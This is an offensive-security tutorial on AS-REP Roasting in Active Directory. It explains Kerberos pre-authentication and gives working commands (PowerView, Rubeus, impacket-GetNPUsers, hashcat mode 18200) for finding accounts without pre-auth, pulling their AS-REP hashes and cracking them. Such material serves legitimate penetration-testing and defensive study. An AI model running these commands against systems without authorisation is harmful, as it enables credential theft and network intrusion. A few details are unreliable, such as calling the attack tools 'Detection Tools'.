OffSec Series – AS-REP Roasting
AS-REP Roasting is a technique used to target weak user account settings in Active Directory, particularly those with the “Do not require Kerberos preauthentication” setting enabled. Attackers abuse the lack of Kerberos pre-authentication to retrieve password hashes, which can then be cracked offline using tools like Hashcat to obtain plaintext passwords.
Contents
| Section | Description |
|---|---|
| Overview | What is AS-REP Roasting and how it works |
| Kerberos Pre-authentication | Understanding the authentication mechanism |
| Abusing Pre-Auth | How attackers exploit disabled pre-authentication |
| Execution | Tools and techniques for exploitation |
| References | Additional resources |
Overview
AS-REP Roasting targets user accounts in Active Directory that have the “Do not require Kerberos preauthentication” setting enabled. This setting allows a user account to request and obtain a service ticket without providing initial authentication, essentially bypassing the need for a password. The hashes can then be cracked offline using tools like hashcat to obtain the passwords.
Kerberos Pre-authentication
Kerberos pre-authentication is an optional feature of the Kerberos protocol that can be used to provide stronger authentication between clients and servers. In Kerberos, authentication is performed by exchanging tickets between the client and the Key Distribution Center (KDC). The KDC is a trusted server that maintains a database of user and service accounts and their associated credentials.
When a client requests a ticket for a service, it sends a pre-authentication message (Authentication Server Request (AS-REQ)) to the DC. The timestamp on that message is encrypted with the hash of the user’s password. This message contains information that the DC can use to verify the client’s identity. If the DC can decrypt that timestamp using its own record of the user’s password hash, it will send back an Authentication Server Response (AS-REP) message that contains a Ticket Granting Ticket (TGT) issued by the Key Distribution Center (KDC), which is used for future access requests by the user.
Pre-authentication can help to improve the security of Kerberos by making it more difficult for attackers to impersonate users. By requiring clients to prove their identity before they are granted a ticket, pre-authentication can help to prevent man-in-the-middle attacks and other forms of attack.
Abusing Pre-Auth
An attacker would typically enumerate to identify a list of user accounts with Pre-Auth setting disabled. They can then request the encrypted AS-REP (Authentication Service Reply) message from the domain controller, which contains the user’s encrypted credentials. By analyzing the encrypted AS-REP offline, the attacker can attempt to crack the user’s password using various password cracking techniques, such as dictionary attacks or brute force attacks.
If successful, the attacker can obtain the user’s plaintext password, allowing them to gain unauthorized access to the user’s account and potentially escalate their privileges within the network.
Execution
Identifying Accounts Vulnerable to AS-REP Roasting
Using PowerView:
Get-DomainUser -PreauthNotRequired
Using AD Module/RSAT tools:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
Using Rubeus
.\Rubeus.exe asreproast
Using impacket-GetNPUsers
Users list dynamically queried with an RPC null session:
impacket-GetNPUsers -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'
With a users file:
impacket-GetNPUsers -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'
Users list dynamically queried with a LDAP authenticated bind (password):
impacket-GetNPUsers -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'
Users list dynamically queried with a LDAP authenticated bind (NT hash):
impacket-GetNPUsers -request -format hashcat -outputfile ASREProastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'
Cracking Obtained Hash Using Hashcat
Hashcat Mode: 18200 (Kerberos 5, etype 23, AS-REP)
sudo hashcat -m 18200 ASREProastables.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
Key Takeaways
| Concept | Key Point |
|---|---|
| Target | User accounts with “Do not require Kerberos preauthentication” enabled |
| Attack Vector | Request AS-REP without password, extract encrypted credentials |
| Hash Type | Kerberos 5 etype 23 AS-REP (Hashcat mode 18200) |
| Detection Tools | PowerView, AD Module, impacket-GetNPUsers, Rubeus |
| Mitigation | Enable pre-authentication for all accounts, use strong passwords |